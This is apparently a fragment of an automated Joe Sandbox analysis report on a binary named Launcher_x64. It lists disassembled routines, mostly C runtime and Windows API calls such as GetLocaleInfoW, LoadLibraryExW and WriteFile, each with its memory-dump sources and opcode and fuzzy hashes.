                                                                                          • Opcode Fuzzy Hash: 6b44eee134c5614f862461b40f8f7c5609b882c177df29fcf1016169af8de50c
                                                                                          • Instruction Fuzzy Hash: F4F0A03630020957CB049B35D85576B7BA4EBC2720B4A8059EA098B290D7759846CBA0
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00D70A63,?,20001004,00000000,00000002,?,?,00D6F971), ref: 00D76429
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID:
                                                                                          • API String ID: 2299586839-0
                                                                                          • Opcode ID: d892bab4f70d0d3d784baee1a090594f99be9c09d62cd52efd9919fa6f7262e9
                                                                                          • Instruction ID: b09df70d5fb58b5bf631f7fa2faf41a7bb2d37937f000de2a95adc91c919c4e6
                                                                                          • Opcode Fuzzy Hash: d892bab4f70d0d3d784baee1a090594f99be9c09d62cd52efd9919fa6f7262e9
                                                                                          • Instruction Fuzzy Hash: 34E04F31500628BBCF122F61DC05EAE7F66EF54754F08C020FD0966621EB31C921ABF5
                                                                                          APIs
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00009B90), ref: 00D69A6C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled
                                                                                          • String ID:
                                                                                          • API String ID: 3192549508-0
                                                                                          • Opcode ID: c59b0bbf44b573fe33e153cc80deeedda2ab4c6e8e909ccd6f96974aad84986d
                                                                                          • Instruction ID: 60f4b29b170453c060c727629d665c6f9c133828f915b119d25e97e387858efc
                                                                                          • Opcode Fuzzy Hash: c59b0bbf44b573fe33e153cc80deeedda2ab4c6e8e909ccd6f96974aad84986d
                                                                                          • Instruction Fuzzy Hash:
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: HeapProcess
                                                                                          • String ID:
                                                                                          • API String ID: 54951025-0
                                                                                          • Opcode ID: 79add0a57c75fa5a6dfc860bb8b129bb40f16e88cdd155eab8acc21bac7bd934
                                                                                          • Instruction ID: 93e4b20810264d03240c9da2fec5279515dd24679ad2442f74ffd46903e10af1
                                                                                          • Opcode Fuzzy Hash: 79add0a57c75fa5a6dfc860bb8b129bb40f16e88cdd155eab8acc21bac7bd934
                                                                                          • Instruction Fuzzy Hash: 4CA012342003028B53404F315904A0C37E4994128030440569010C0320D72440406F10
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1f8dea80b8770cce831966e330374367912e5812ec179aa93f16c77d62f56bc0
                                                                                          • Instruction ID: c353db78970028255327967b1bf9447b6396045c1a162166ffb86956e92b4b88
                                                                                          • Opcode Fuzzy Hash: 1f8dea80b8770cce831966e330374367912e5812ec179aa93f16c77d62f56bc0
                                                                                          • Instruction Fuzzy Hash: 0DD0923A641A59AFC610CF49E440D41F7B8FB8E770B154166EA4893B20C331FC11CAE0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: __freea$__alloca_probe_16$Info
                                                                                          • String ID:
                                                                                          • API String ID: 127012223-0
                                                                                          • Opcode ID: c1ca8deeccd68d50247960c7d48acd449f55208c01de866e9b8b7913a48996ad
                                                                                          • Instruction ID: 49a35b566737594274ff105722d898b4ce4c5f8dac78fe18e3ada44ba398b050
                                                                                          • Opcode Fuzzy Hash: c1ca8deeccd68d50247960c7d48acd449f55208c01de866e9b8b7913a48996ad
                                                                                          • Instruction Fuzzy Hash: A371E27290424BABDF20BF98CC52BAE7BB9EF45314F294059F914B7281E6B5DC0087B4
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strrchr
                                                                                          • String ID:
                                                                                          • API String ID: 3213747228-0
                                                                                          • Opcode ID: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                          • Instruction ID: 934878f86550f09cd9263c6ed98f554efb05fbd23718919bf43427b62466e413
                                                                                          • Opcode Fuzzy Hash: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                          • Instruction Fuzzy Hash: BAB15972E40355AFDB158F28CC85BAEBBA5EF55310F288155E809AF282FA70D901D7B1
                                                                                          APIs
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00D6ABE7
                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00D6ABEF
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00D6AC78
                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00D6ACA3
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 00D6ACF8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                          • String ID: csm
                                                                                          • API String ID: 1170836740-1018135373
                                                                                          • Opcode ID: a50e96063a7a32610a96aada5172f8ce247016b681aaeaf844048760dd7a47af
                                                                                          • Instruction ID: 3b3b2a0a53eeed51e44078616cf7293e44cf32aa857e983f8c8a60b6df6d6164
                                                                                          • Opcode Fuzzy Hash: a50e96063a7a32610a96aada5172f8ce247016b681aaeaf844048760dd7a47af
                                                                                          • Instruction Fuzzy Hash: 1041B238A002189BCF10EF6CD885A9E7BA1EF45324F198155E859AB352D771EA01CFB2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8cf738a12c8ef120bdcaccad7852b1a7b9f9201c371029d06cddb61469c8d689
                                                                                          • Instruction ID: 611d60a1b236edbc5d0d9e650fde31abdce939d2bd48a4ca5f400ba2e4f4b500
                                                                                          • Opcode Fuzzy Hash: 8cf738a12c8ef120bdcaccad7852b1a7b9f9201c371029d06cddb61469c8d689
                                                                                          • Instruction Fuzzy Hash: FCB10370A04349AFEB11EFA9C881BBEBBB5FF45B10F184258E51997392D7709A41CB70
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,00D74464,00D6A97D,00D69BD4), ref: 00D7447B
                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D74489
                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D744A2
                                                                                          • SetLastError.KERNEL32(00000000,00D74464,00D6A97D,00D69BD4), ref: 00D744F4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                          • String ID:
                                                                                          • API String ID: 3852720340-0
                                                                                          • Opcode ID: 5f01d3e6689b96477237c2ec5e82e6e067a95666a1bc332b0e601c6bc4f3a67f
                                                                                          • Instruction ID: 27668c365a16668fd51b1610f9fa088bc9c2a33a7cfb00d193f4ff9394e57a4f
                                                                                          • Opcode Fuzzy Hash: 5f01d3e6689b96477237c2ec5e82e6e067a95666a1bc332b0e601c6bc4f3a67f
                                                                                          • Instruction Fuzzy Hash: F101883210A3116EF7262779BC85A6B2B94EB41778B28833AF518951F5FF914C01A670
                                                                                          APIs
                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 00D74E6B
                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 00D750E4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: CallUnexpectedtype_info::operator==
                                                                                          • String ID: csm$csm$csm
                                                                                          • API String ID: 2673424686-393685449
                                                                                          • Opcode ID: aa79965707f20ab5208506f4bddb84597247b5257e2b50efbbab2174bade718f
                                                                                          • Instruction ID: 07c35343a6df0caaca8df01867173df263c8bc8a7e0d0462df5e49a4ef2817ee
                                                                                          • Opcode Fuzzy Hash: aa79965707f20ab5208506f4bddb84597247b5257e2b50efbbab2174bade718f
                                                                                          • Instruction Fuzzy Hash: FCB17C31800219EFCF16DF94D8419AEB7B5FF04310B18855AF9186B216E7B1DA61CFB2
                                                                                          APIs
                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BFBEED24,?,?,00000000,00D85684,000000FF,?,00D6F2B9,00D6F1A0,?,00D6F355,00000000), ref: 00D6F22D
                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D6F23F
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,00D85684,000000FF,?,00D6F2B9,00D6F1A0,?,00D6F355,00000000), ref: 00D6F261
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 4061214504-1276376045
                                                                                          • Opcode ID: e63fedd86e2b76e82106d09fc20f444a364ce4514752a478c53925be17ee4a0c
                                                                                          • Instruction ID: 450ec39a652cd495261d9672dc95dbe26bc31b3cbf07e6615cf0ff5d58ce8e43
                                                                                          • Opcode Fuzzy Hash: e63fedd86e2b76e82106d09fc20f444a364ce4514752a478c53925be17ee4a0c
                                                                                          • Instruction Fuzzy Hash: 12018F35964669EFDB019B50EC0ABAEBBB8FB44B15F040625E811E23D0DB749904CFA0
                                                                                          APIs
                                                                                          • __alloca_probe_16.LIBCMT ref: 00D76EAF
                                                                                          • __alloca_probe_16.LIBCMT ref: 00D76F78
                                                                                          • __freea.LIBCMT ref: 00D76FDF
                                                                                            • Part of subcall function 00D756F1: RtlAllocateHeap.NTDLL(00000000,00D77675,?,?,00D77675,00000220,?,?,?), ref: 00D75723
                                                                                          • __freea.LIBCMT ref: 00D76FF2
                                                                                          • __freea.LIBCMT ref: 00D76FFF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1423051803-0
                                                                                          • Opcode ID: d1bc91e7a264ae00e751d288437c385de5adcb372fdbc722624730b76de374c3
                                                                                          • Instruction ID: cde01a86448bb64052969109a29847d4c287507c2000c9e06a044bb4961f635d
                                                                                          • Opcode Fuzzy Hash: d1bc91e7a264ae00e751d288437c385de5adcb372fdbc722624730b76de374c3
                                                                                          • Instruction Fuzzy Hash: 2051C172600A56AFEB219F64EC81EFBBAA9EF44754B198439FD0CD6150FB71DC1086B0
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 00D677F9
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00D67804
                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00D67872
                                                                                            • Part of subcall function 00D676EF: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D67707
                                                                                          • std::locale::_Setgloballocale.LIBCPMT ref: 00D6781F
                                                                                          • _Yarn.LIBCPMT ref: 00D67835
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                          • String ID:
                                                                                          • API String ID: 1088826258-0
                                                                                          • Opcode ID: cae97618439fcc1a3ebf9be16cf1e0962fbee6e26498ccbc166a95722a759bd0
                                                                                          • Instruction ID: ff328a141bef2c07463cd1d96ba741a74c40fe001eb9a12c0d9c46b7d841cd57
                                                                                          • Opcode Fuzzy Hash: cae97618439fcc1a3ebf9be16cf1e0962fbee6e26498ccbc166a95722a759bd0
                                                                                          • Instruction Fuzzy Hash: AC01BC79A046159BCB06EF20D84A97C7B76FF90354B09004AE80297381DF34AE02CFB1
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00D7F74C,00000000,?,00D91E20,?,?,?,00D7F683,00000004,InitializeCriticalSectionEx,00D890D4,00D890DC), ref: 00D7F6BD
                                                                                          • GetLastError.KERNEL32(?,00D7F74C,00000000,?,00D91E20,?,?,?,00D7F683,00000004,InitializeCriticalSectionEx,00D890D4,00D890DC,00000000,?,00D7539C), ref: 00D7F6C7
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00D7F6EF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                          • String ID: api-ms-
                                                                                          • API String ID: 3177248105-2084034818
                                                                                          • Opcode ID: 4b6b66efdaef552814493662018621db916e351e4a95182b50e4c1508b8ff498
                                                                                          • Instruction ID: 9649057d55f4aa738aeba20f2f7053ce65688110d35b410fc931d5824f72fe93
                                                                                          • Opcode Fuzzy Hash: 4b6b66efdaef552814493662018621db916e351e4a95182b50e4c1508b8ff498
                                                                                          • Instruction Fuzzy Hash: 27E01230250305BAEB312B61EC0AB5C3B949B00B51F244430F90CE81A0FBA299509EB5
                                                                                          APIs
                                                                                          • GetConsoleOutputCP.KERNEL32(BFBEED24,00000000,00000000,?), ref: 00D7D7B1
                                                                                            • Part of subcall function 00D75801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D76FD5,?,00000000,-00000008), ref: 00D75862
                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D7DA03
                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D7DA49
                                                                                          • GetLastError.KERNEL32 ref: 00D7DAEC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                          • String ID:
                                                                                          • API String ID: 2112829910-0
                                                                                          • Opcode ID: 31c7f4c0adcb32c62f68f583b6b5b81c58c002ca9f1d1de5e0a465e81d617471
                                                                                          • Instruction ID: 6b0872a12a3c1cfdac55e332845d70aeb28ba51a8759c91ad726652ece449012
                                                                                          • Opcode Fuzzy Hash: 31c7f4c0adcb32c62f68f583b6b5b81c58c002ca9f1d1de5e0a465e81d617471
                                                                                          • Instruction Fuzzy Hash: F9D16B75D042589FCF15CFA8C8809ADBBB6FF49314F28816AE45AEB351E730A941CB60
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustPointer
                                                                                          • String ID:
                                                                                          • API String ID: 1740715915-0
                                                                                          • Opcode ID: 848afbc038789c983303edabf5c9d1e30fb8589e26ef94b0d315bef32108477d
                                                                                          • Instruction ID: bfa667a247651479553afdf958c157f4aa9a4968cd26a6be25c50837e22a2b81
